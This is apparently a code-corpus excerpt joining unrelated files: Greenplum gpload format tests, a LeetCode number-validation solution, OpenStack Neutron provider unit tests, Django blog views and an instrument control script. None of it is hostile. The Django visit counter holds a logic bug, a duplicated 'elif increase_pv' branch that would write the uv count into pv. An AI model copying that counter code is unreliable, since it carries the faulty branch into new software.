def test_01_gpload_formatOpts_delimiter(self):
"1 gpload formatOpts delimiter '|' with reuse "
copy_data('external_file_01.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="'|'")
self.doTest(1)
def test_02_gpload_formatOpts_delimiter(self):
"2 gpload formatOpts delimiter '\t' with reuse"
copy_data('external_file_02.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="'\t'")
self.doTest(2)
def test_03_gpload_formatOpts_delimiter(self):
"3 gpload formatOpts delimiter E'\t' with reuse"
copy_data('external_file_02.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="E'\\t'")
self.doTest(3)
def test_04_gpload_formatOpts_delimiter(self):
"4 gpload formatOpts delimiter E'\u0009' with reuse"
copy_data('external_file_02.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="E'\u0009'")
self.doTest(4)
def test_05_gpload_formatOpts_delimiter(self):
"5 gpload formatOpts delimiter E'\\'' with reuse"
copy_data('external_file_03.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="E'\''")
self.doTest(5)
def test_06_gpload_formatOpts_delimiter(self):
"6 gpload formatOpts delimiter \"'\" with reuse"
copy_data('external_file_03.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="\"'\"")
self.doTest(6)
def test_07_gpload_reuse_table_insert_mode_without_reuse(self):
"7 gpload insert mode without reuse"
runfile(mkpath('setup.sql'))
f = open(mkpath('query7.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from texttable;'")
f.close()
write_config_file(mode='insert',reuse_flag='false')
self.doTest(7)
def test_08_gpload_reuse_table_update_mode_with_reuse(self):
"8 gpload update mode with reuse"
drop_tables()
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='true',file='data_file.txt')
self.doTest(8)
def test_09_gpload_reuse_table_update_mode_without_reuse(self):
"9 gpload update mode without reuse"
f = open(mkpath('query9.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from texttable;'\n"+"\! psql -d reuse_gptest -c 'select * from texttable where n2=222;'")
f.close()
copy_data('external_file_05.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='false',file='data_file.txt')
self.doTest(9)
def test_10_gpload_reuse_table_merge_mode_with_reuse(self):
"10 gpload merge mode with reuse "
drop_tables()
copy_data('external_file_06.txt','data_file.txt')
write_config_file('merge','true',file='data_file.txt')
self.doTest(10)
def test_11_gpload_reuse_table_merge_mode_without_reuse(self):
"11 gpload merge mode without reuse "
copy_data('external_file_07.txt','data_file.txt')
write_config_file('merge','false',file='data_file.txt')
self.doTest(11)
def test_12_gpload_reuse_table_merge_mode_with_different_columns_number_in_file(self):
"12 gpload merge mode with reuse (RERUN with different columns number in file) "
psql_run(cmd="ALTER TABLE texttable ADD column n8 text",dbname='reuse_gptest')
copy_data('external_file_08.txt','data_file.txt')
write_config_file('merge','true',file='data_file.txt')
self.doTest(12)
def test_13_gpload_reuse_table_merge_mode_with_different_columns_number_in_DB(self):
"13 gpload merge mode with reuse (RERUN with different columns number in DB table) "
preTest = mkpath('pre_test_13.sql')
psql_run(preTest, dbname='reuse_gptest')
copy_data('external_file_09.txt','data_file.txt')
write_config_file('merge','true',file='data_file.txt')
self.doTest(13)
def test_14_gpload_reuse_table_update_mode_with_reuse_RERUN(self):
"14 gpload update mode with reuse (RERUN) "
write_config_file('update','true',file='data_file.txt')
self.doTest(14)
def test_15_gpload_reuse_table_merge_mode_with_different_columns_order(self):
"15 gpload merge mode with different columns' order "
copy_data('external_file_10.txt','data/data_file.tbl')
write_config_file('merge','true',file='data/data_file.tbl',columns_flag='1',mapping='1')
self.doTest(15)
def test_16_gpload_formatOpts_quote(self):
"16 gpload formatOpts quote unspecified in CSV with reuse "
copy_data('external_file_11.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','")
self.doTest(16)
def test_17_gpload_formatOpts_quote(self):
"17 gpload formatOpts quote '\\x26'(&) with reuse"
copy_data('external_file_12.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",quote="'\x26'")
self.doTest(17)
def test_18_gpload_formatOpts_quote(self):
"18 gpload formatOpts quote E'\\x26'(&) with reuse"
copy_data('external_file_12.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",quote="E'\x26'")
self.doTest(18)
def test_19_gpload_formatOpts_escape(self):
"19 gpload formatOpts escape '\\' with reuse"
copy_data('external_file_01.txt','data_file.txt')
file = mkpath('setup.sql')
runfile(file)
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',escape='\\')
self.doTest(19)
def test_20_gpload_formatOpts_escape(self):
"20 gpload formatOpts escape '\\' with reuse"
copy_data('external_file_01.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',escape= '\x5C')
self.doTest(20)
def test_21_gpload_formatOpts_escape(self):
"21 gpload formatOpts escape E'\\\\' with reuse"
copy_data('external_file_01.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',escape="E'\\\\'")
self.doTest(21)
# case 22 is flaky on concourse. It may report: Fatal Python error: GC object already tracked during testing.
# This is seldom issue. we can't reproduce it locally, so we disable it, in order to not blocking others
#def test_22_gpload_error_count(self):
# "22 gpload error count"
# f = open(mkpath('query22.sql'),'a')
# f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
# f.close()
# f = open(mkpath('data/large_file.csv'),'w')
# for i in range(0, 10000):
# if i % 2 == 0:
# f.write('1997,Ford,E350,"ac, abs, moon",3000.00,a\n')
# else:
# f.write('1997,Ford,E350,"ac, abs, moon",3000.00\n')
# f.close()
# copy_data('large_file.csv','data_file.csv')
# write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='90000000')
# self.doTest(22)
def test_23_gpload_error_count(self):
"23 gpload error_table"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query23.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
f = open(mkpath('data/large_file.csv'),'w')
for i in range(0, 10000):
if i % 2 == 0:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00,a\n')
else:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00\n')
f.close()
copy_data('large_file.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",error_table="err_table",error_limit='90000000')
self.doTest(23)
def test_24_gpload_error_count(self):
"24 gpload error count with ext schema"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query24.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
f = open(mkpath('data/large_file.csv'),'w')
for i in range(0, 10000):
if i % 2 == 0:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00,a\n')
else:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00\n')
f.close()
copy_data('large_file.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='90000000',externalSchema='test')
self.doTest(24)
def test_25_gpload_ext_staging_table(self):
"25 gpload reuse ext_staging_table if it is configured"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query25.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='staging_table')
self.doTest(25)
def test_26_gpload_ext_staging_table_with_externalschema(self):
"26 gpload reuse ext_staging_table if it is configured with externalschema"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query26.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='staging_table',externalSchema='test')
self.doTest(26)
def test_27_gpload_ext_staging_table_with_externalschema(self):
"27 gpload reuse ext_staging_table if it is configured with externalschema"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query27.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from test.csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='test.csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='staging_table',externalSchema="'%'")
self.doTest(27)
def test_28_gpload_ext_staging_table_with_dot(self):
"28 gpload reuse ext_staging_table if it is configured with dot"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query28.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from test.csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='test.csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='t.staging_table')
self.doTest(28)
def test_29_gpload_reuse_table_insert_mode_with_reuse_and_null(self):
"29 gpload insert mode with reuse and null"
runfile(mkpath('setup.sql'))
f = open(mkpath('query29.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from texttable where n2 is null;'")
f.close()
copy_data('external_file_14.txt','data_file.txt')
write_config_file(mode='insert',reuse_flag='true',file='data_file.txt',log_errors=True, error_limit='100')
self.doTest(29)
def test_30_gpload_reuse_table_update_mode_with_fast_match(self):
"30 gpload update mode with fast match"
drop_tables()
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='true',fast_match='true',file='data_file.txt')
self.doTest(30)
def test_31_gpload_reuse_table_update_mode_with_fast_match_and_different_columns_number(self):
"31 gpload update mode with fast match and differenct columns number) "
psql_run(cmd="ALTER TABLE texttable ADD column n8 text",dbname='reuse_gptest')
copy_data('external_file_08.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='true',fast_match='true',file='data_file.txt')
self.doTest(31)
def test_32_gpload_update_mode_without_reuse_table_with_fast_match(self):
"32 gpload update mode when reuse table is false and fast match is true"
drop_tables()
copy_data('external_file_08.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='false',fast_match='true',file='data_file.txt')
self.doTest(32)
def test_33_gpload_reuse_table_merge_mode_with_fast_match_and_external_schema(self):
"33 gpload update mode with fast match and external schema"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='true',file='data_file.txt',externalSchema='test')
self.doTest(33)
def test_34_gpload_reuse_table_merge_mode_with_fast_match_and_encoding(self):
"34 gpload merge mode with fast match and encoding GBK"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='true',file='data_file.txt',encoding='GBK')
self.doTest(34)
def test_35_gpload_reuse_table_merge_mode_with_fast_match_default_encoding(self):
"35 gpload does not reuse table when encoding is setted from GBK to empty"
write_config_file(mode='merge',reuse_flag='true',fast_match='true',file='data_file.txt')
self.doTest(35)
def test_36_gpload_reuse_table_merge_mode_default_encoding(self):
"36 gpload merge mode with encoding GBK"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='false',file='data_file.txt',encoding='GBK')
self.doTest(36)
def test_37_gpload_reuse_table_merge_mode_invalid_encoding(self):
"37 gpload merge mode with invalid encoding"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='false',file='data_file.txt',encoding='xxxx')
self.doTest(37)
def test_38_gpload_without_preload(self):
"38 gpload insert mode without preload"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='insert',reuse_flag='true',fast_match='false',file='data_file.txt',error_table="err_table",error_limit='1000',preload=False)
self.doTest(38)
def test_39_gpload_fill_missing_fields(self):
"39 gpload fill missing fields"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='insert',reuse_flag='false',fast_match='false',file='data_file.txt',table='texttable1', error_limit='1000', fill=True)
self.doTest(39)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(GPLoad_FormatOpts_TestCase)
runner = unittest.TextTestRunner(verbosity=2)
ret = not runner.run(suite).wasSuccessful()
sys.exit(ret)
| 2.453125 | 2 |
code_week19_831_96/biao_shi_shu_zi.py | dylanlee101/leetcode | 0 | 1102 | <filename>code_week19_831_96/biao_shi_shu_zi.py
'''
请实现一个函数用来判断字符串是否表示数值(包括整数和小数)。例如,字符串"+100"、"5e2"、"-123"、"3.1416"、"-1E-16"、"0123"都表示数值,但"12e"、"1a3.14"、"1.2.3"、"+-5"及"12e+5.4"都不是。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/biao-shi-shu-zhi-de-zi-fu-chuan-lcof
'''
class Solution:
def isNumber(self, s: str) -> bool:
states = [
{ ' ': 0, 's': 1, 'd': 2, '.': 4 }, # 0. start with 'blank'
{ 'd': 2, '.': 4 } , # 1. 'sign' before 'e'
{ 'd': 2, '.': 3, 'e': 5, ' ': 8 }, # 2. 'digit' before 'dot'
{ 'd': 3, 'e': 5, ' ': 8 }, # 3. 'digit' after 'dot'
{ 'd': 3 }, # 4. 'digit' after 'dot' (‘blank’ before 'dot')
{ 's': 6, 'd': 7 }, # 5. 'e'
{ 'd': 7 }, # 6. 'sign' after 'e'
{ 'd': 7, ' ': 8 }, # 7. 'digit' after 'e'
{ ' ': 8 } # 8. end with 'blank'
]
p = 0 # start with state 0
for c in s:
if '0' <= c <= '9': t = 'd' # digit
elif c in "+-": t = 's' # sign
elif c in "eE": t = 'e' # e or E
elif c in ". ": t = c # dot, blank
else: t = '?' # unknown
if t not in states[p]: return False
p = states[p][t]
return p in (2, 3, 7, 8)
| 2.859375 | 3 |
teeth_overlord/tests/unit/networks/neutron.py | rackerlabs/teeth-overlord | 0 | 1103 | <reponame>rackerlabs/teeth-overlord
"""
Copyright 2013 Rackspace, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections
from teeth_overlord import config
from teeth_overlord.networks import neutron
from teeth_overlord import tests
from keystoneclient.apiclient import exceptions as keystone_exceptions
from keystoneclient.v2_0 import client as keystone_client
from neutronclient.common import exceptions as neutron_exceptions
from neutronclient.neutron import client as neutron_client
NETWORK1_RESPONSE = {
u'status': u'ACTIVE',
u'subnets': [u'SUBNET1'],
u'name': u'private',
u'provider:physical_network': None,
u'admin_state_up': True,
u'tenant_id': u'TENANTID',
u'provider:network_type': u'local',
u'router:external': False,
u'shared': False,
u'id': u'NETWORK1',
u'provider:segmentation_id': None
}
NETWORK2_RESPONSE = {
u'status': u'ACTIVE',
u'subnets': [u'SUBNET2'],
u'name': u'public',
u'provider:physical_network': None,
u'admin_state_up': True,
u'tenant_id': u'TENANTID',
u'provider:network_type': u'local',
u'router:external': True,
u'shared': False,
u'id': u'NETWORK2',
u'provider:segmentation_id': None
}
PORT1_RESPONSE = {
u'status': u'ACTIVE',
u'binding:host_id': u'precise64',
u'name': u'',
u'allowed_address_pairs': [],
u'admin_state_up': True,
u'network_id': u'NETWORK1',
u'tenant_id': u'TENANTID',
u'extra_dhcp_opts': [],
u'binding:vif_type': u'ovs',
u'device_owner': u'network:dhcp',
u'binding:capabilities': {u'port_filter': True},
u'mac_address': u'fa:16:3e:e0:d4:63',
u'fixed_ips': [
{
u'subnet_id': u'SUBNET1',
u'ip_address': u'10.0.0.3'
}
],
u'id': u'PORT1',
u'security_groups': [],
u'device_id': u''
}
PORT2_RESPONSE = {
u'status': u'DOWN',
u'binding:host_id': u'',
u'name': u'',
u'allowed_address_pairs': [],
u'admin_state_up': True,
u'network_id': u'NETWORK2',
u'tenant_id': u'TENANTID',
u'extra_dhcp_opts': [],
u'binding:vif_type': u'unbound',
u'device_owner': u'',
u'binding:capabilities': {u'port_filter': False},
u'mac_address': u'00:09:7b:3e:18:ca',
u'fixed_ips': [
{
u'subnet_id': u'SUBNET2',
u'ip_address': u'192.168.27.3'
}
],
u'id': u'PORT2',
u'security_groups': [u'SECGRP'],
u'device_id': u''
}
SUBNET1_RESPONSE = {
u'name': u'private-subnet',
u'enable_dhcp': True,
u'network_id': u'NETWORK1',
u'tenant_id': u'TENANTID',
u'dns_nameservers': [],
u'allocation_pools': [
{
u'start': u'10.0.0.2',
u'end': u'10.0.0.254'
}
],
u'host_routes': [],
u'ip_version': 4,
u'gateway_ip': u'10.0.0.1',
u'cidr': u'10.0.0.0/24',
u'id': u'SUBNET1'
}
SUBNET2_RESPONSE = {
u'name': u'public-subnet',
u'enable_dhcp': False,
u'network_id': u'NETWORK2',
u'tenant_id': u'TENANTID',
u'dns_nameservers': [],
u'allocation_pools': [
{
u'start': u'192.168.27.1',
u'end': u'192.168.27.1'
},
{
u'start': u'192.168.27.3',
u'end': u'192.168.27.254'
}
],
u'host_routes': [],
u'ip_version': 4,
u'gateway_ip': u'192.168.27.2',
u'cidr': u'192.168.27.0/24',
u'id': u'SUBNET2'
}
SERIALIZED_NETWORK1 = collections.OrderedDict([
('id', u'NETWORK1'),
('name', u'private'),
('status', u'ACTIVE'),
('subnets', [
collections.OrderedDict([
('id', u'SUBNET1'),
('name', u'private-subnet'),
('ip_version', 4),
('gateway_ip', u'10.0.0.1'),
('cidr', u'10.0.0.0/24'),
('enable_dhcp', True)
])
])
])
SERIALIZED_NETWORK2 = collections.OrderedDict([
('id', u'NETWORK2'),
('name', u'public'),
('status', u'ACTIVE'),
('subnets', [
collections.OrderedDict([
('id', u'SUBNET2'),
('name', u'public-subnet'),
('ip_version', 4),
('gateway_ip', u'192.168.27.2'),
('cidr', u'192.168.27.0/24'),
('enable_dhcp', False)
])
])
])
SERIALIZED_PORT1 = collections.OrderedDict([
('id', u'PORT1'),
('name', u''),
('status', u'ACTIVE'),
('mac_address', u'fa:16:3e:e0:d4:63'),
('fixed_ips', [
{
u'subnet_id': u'SUBNET1',
u'ip_address': u'10.0.0.3'
}
]),
('network', SERIALIZED_NETWORK1)
])
class TestNeutronProvider(tests.TeethMockTestUtilities):
def setUp(self):
super(TestNeutronProvider, self).setUp()
self.config = config.LazyConfig(config={
'KEYSTONE_USER': 'user',
'KEYSTONE_PASS': '<PASSWORD>',
'KEYSTONE_TENANT_ID': 'tenant',
'KEYSTONE_AUTH_URL': 'auth_url',
'NEUTRON_VERSION': '2.0',
'NEUTRON_URL': 'neutron_url',
'NEUTRON_PUBLIC_NETWORK': 'd6b32008-1432-4299-81c7-cbe3128ba13f',
'NEUTRON_PRIVATE_NETWORK': '2afa16d6-7b84-484f-a642-af243b0e5b10',
'NEUTRON_SERVICE_NETWORK': '2afa16d6-7b84-484f-a642-af243b0e5b10',
})
self.neutron_client_mock = self.add_mock(neutron_client, 'Client')
self.neutron_mock = self.neutron_client_mock.return_value
self.keystone_client_mock = self.add_mock(keystone_client, 'Client')
self.keystone_client_mock.return_value.auth_token = '<PASSWORD>'
self.provider = neutron.NeutronProvider(self.config)
def test_get_auth_token(self):
t = self.provider._get_auth_token()
self.assertEqual(t, 'auth_token')
self.keystone_client_mock.assert_called_with(
username='user',
password='<PASSWORD>',
tenant_id='tenant',
auth_url='auth_url'
)
def test_get_auth_token_client_exception(self):
exc = keystone_exceptions.ClientException
self.keystone_client_mock.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider._get_auth_token)
def test_get_neutron_client(self):
self.provider._get_neutron_client()
self.neutron_client_mock.assert_called_with(
'2.0',
endpoint_url='neutron_url',
token='auth_token'
)
def test_get_neutron_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_client_mock.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider._get_neutron_client)
def test_list_networks(self):
networks = {'networks': [NETWORK1_RESPONSE,
NETWORK2_RESPONSE]}
self.neutron_mock.list_networks.return_value = networks
self.neutron_mock.show_subnet.side_effect = [
{'subnet': SUBNET1_RESPONSE},
{'subnet': SUBNET2_RESPONSE}
]
networks = self.provider.list_networks()
results = [
SERIALIZED_NETWORK1,
SERIALIZED_NETWORK2
]
self.assertEqual([n.serialize() for n in networks], results)
def test_list_networks_empty(self):
self.neutron_mock.list_networks.return_value = {'networks': []}
networks = self.provider.list_networks()
self.neutron_mock.list_networks.assert_called()
self.assertEqual(networks, [])
def test_list_networks_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_mock.list_networks.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.list_networks)
def test_get_network_info(self):
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
self.neutron_mock.show_subnet.side_effect = [
{'subnet': SUBNET1_RESPONSE}
]
network = self.provider.get_network_info('NETWORK1')
self.assertEqual(network.serialize(), SERIALIZED_NETWORK1)
self.neutron_mock.show_network.assert_called_with('NETWORK1')
def test_get_network_info_does_not_exist(self):
exc = neutron_exceptions.NeutronException()
exc.message = '404 Not Found'
self.neutron_mock.show_network.side_effect = exc
self.assertRaises(self.provider.NetworkDoesNotExist,
self.provider.get_network_info,
'NETWORK1')
def test_get_network_info_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_mock.show_network.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.get_network_info,
'NETWORK1')
def test_list_ports(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
ports = self.provider.list_ports('a:b:c:d')
self.assertEqual([p.serialize() for p in ports], [SERIALIZED_PORT1])
self.neutron_mock.list_ports.assert_called_with(mac_address='a:b:c:d')
def test_attach(self):
port = {'port': PORT1_RESPONSE}
self.neutron_mock.create_port.return_value = port
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
port = self.provider.attach('a:b:c:d', 'network_id')
self.neutron_mock.create_port.assert_called_with({
'port': {
'network_id': 'network_id',
'admin_state_up': True,
'mac_address': 'a:b:c:d'
}
})
self.assertEqual(port.serialize(), SERIALIZED_PORT1)
def test_attach_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_mock.create_port.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.attach,
'mac_address', 'network_id')
def test_detatch(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
self.provider.detach('a:b:c:d')
self.neutron_mock.delete_port.assert_called_with(PORT1_RESPONSE['id'])
self.neutron_mock.list_ports.assert_called_with(mac_address='a:b:c:d')
def test_detach_specific_network(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
self.provider.detach('a:b:c:d', 'network_id')
self.neutron_mock.delete_port.assert_called_with(PORT1_RESPONSE['id'])
self.neutron_mock.list_ports.assert_called_with(
mac_address='a:b:c:d', network_id='network_id')
def test_detach_client_exception(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
exc = neutron_exceptions.NeutronException()
self.neutron_mock.delete_port.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.detach,
'a:b:c:d')
def test_get_default_networks(self):
network_ids = self.provider.get_default_networks()
self.assertEqual(network_ids, [self.config.NEUTRON_PUBLIC_NETWORK,
self.config.NEUTRON_PRIVATE_NETWORK])
def test_get_service_network(self):
network_id = self.provider.get_service_network()
self.assertEqual(network_id, self.config.NEUTRON_SERVICE_NETWORK)
| 1.390625 | 1 |
classes/settings.py | johnyburd/glucometer | 12 | 1104 | def init():
global brightness
global calibration_mode
brightness = 500
calibration_mode = False
| 1.414063 | 1 |
typeidea/blog/views.py | Phoenix-sy/typeidea | 0 | 1105 | from datetime import date
from django.core.cache import cache
from django.db.models import Q, F
from django.shortcuts import render
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
#from silk.profiling.profiler import silk_profile
from config.models import SideBar
from .models import Post, Tag, Category
from comment.models import Comment
class CommonViewMinxin:
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context.update({
'sidebars': self.get_sidebars(),
})
context.update(self.get_navs())
return context
def get_sidebars(self):
return SideBar.objects.filter(status=SideBar.STATUS_SHOW)
def get_navs(self):
categories = Category.objects.filter(status=Category.STATUS_NORMAL)
nav_categories = []
normal_categories = []
for cate in categories:
if cate.is_nav:
nav_categories.append(cate)
else:
normal_categories.append(cate)
return {
'navs': nav_categories,
'categories': normal_categories,
}
class IndexView(CommonViewMinxin, ListView):
queryset = Post.latest_posts()
paginate_by = 5
context_object_name = 'post_list'
template_name = 'blog/list.html'
class CategoryView(IndexView):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
category_id = self.kwargs.get('category_id')
category = get_object_or_404(Category, pk=category_id)
context.update({
'category': category,
})
return context
def get_queryset(self):
'''重写queryset,根据分类过滤'''
queryset = super().get_queryset()
category_id = self.kwargs.get('category_id')
return queryset.filter(category_id=category_id)
class TagView(IndexView):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
tag_id = self.kwargs.get('tag_id')
tag = get_object_or_404(Tag, pk=tag_id)
context.update({
'tag': tag,
})
return context
def get_queryset(self):
'''重写queryset,根据标签过滤'''
queryset = super().get_queryset()
tag_id = self.kwargs.get('tag_id')
return queryset.filter(tag__id=tag_id)
class PostDetailView(CommonViewMinxin, DetailView):
queryset = Post.latest_posts()
template_name = 'blog/detail.html'
context_object_name = 'post'
pk_url_kwarg = 'post_id'
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
self.handle_visited()
return response
def handle_visited(self):
increase_pv = False
increase_uv = False
uid = self.request.uid
pv_key = 'pv:%s:%s' % (uid, self.request.path)
uv_key = 'uv:%s:%s:%s' % (uid, str(date.today()), self.request.path)
if not cache.get(pv_key):
increase_pv = True
cache.set(pv_key, 1, 1*60) #1分钟有效
if not cache.get(uv_key):
increase_uv = True
cache.set(uv_key, 1, 24*60*60)
if increase_pv and increase_uv:
Post.objects.filter(pk=self.object.id).update(pv=F('pv') + 1,
uv=F('uv') + 1)
elif increase_pv:
Post.objects.filter(pk=self.object.id).update(pv=F('pv') + 1)
elif increase_pv:
Post.objects.filter(pk=self.object.id).update(pv=F('uv') + 1)
class SearchView(IndexView):
def get_context_data(self):
context = super().get_context_data()
context.update({
'keyword': self.request.GET.get('keyword', '')
})
return context
def get_queryset(self):
queryset = super().get_queryset()
keyword = self.request.GET.get('keyword')
if not keyword:
return queryset
return queryset.filter(Q(title__icontains=keyword) | Q(desc__icontains
=keyword))
class AuthorView(IndexView):
def get_queryset(self):
queryset = super().get_queryset()
author_id = self.kwargs.get('owner_id')
return queryset.filter(owner_id=author_id)
'''
def post_list(request, category_id=None, tag_id=None):
tag = None
category = None
if tag_id:
post_list, tag = Post.get_by_tag(tag_id)
elif category_id:
post_list, category=Post.get_by_category(category_id)
else:
post_list = Post.latest_posts()
context = {
'category': category,
'tag': tag,
'post_list': post_list,
'sidebars': SideBar.get_all(),
}
context.update(Category.get_navs())
return render(request, 'blog/list.html', context=context)
def post_detail(request, post_id=None):
try:
post = Post.objects.get(id=post_id)
except Post.DoesNotExist:
raise Http404('Post does not exist!')
context={
'post': post,
'sidebars': SideBar.get_all(),
}
context.update(Category.get_navs())
return render(request, 'blog/detail.html', context=context)
'''
| 2 | 2 |
VMI/VMItest.py | thomasbarillot/DAQ | 1 | 1106 | <reponame>thomasbarillot/DAQ
# -*- coding: utf-8 -*-
"""
Created on Sat May 7 11:38:18 2016
@author: thomasbarillot
VMI control
"""
from ctypes import cdll
#slib="VMIcrtl_ext.dll"
#hlib=cdll('VMIcrtl.dll')
import VMIcrtl_ext
test=VMIcrtl_ext.VMIcrtl()
#%%
print test.GetFilename()
#%%
test.setFilename('20161115_1841.dat')
print test.GetFilename()
#%%
test.StartAcquisitionPrev()
#%%
test.StopAcquisition()
#%%
img=test.RecallImagePrev()
#%%
import numpy as np
print np.shape(img)
a=np.array(img)
print a
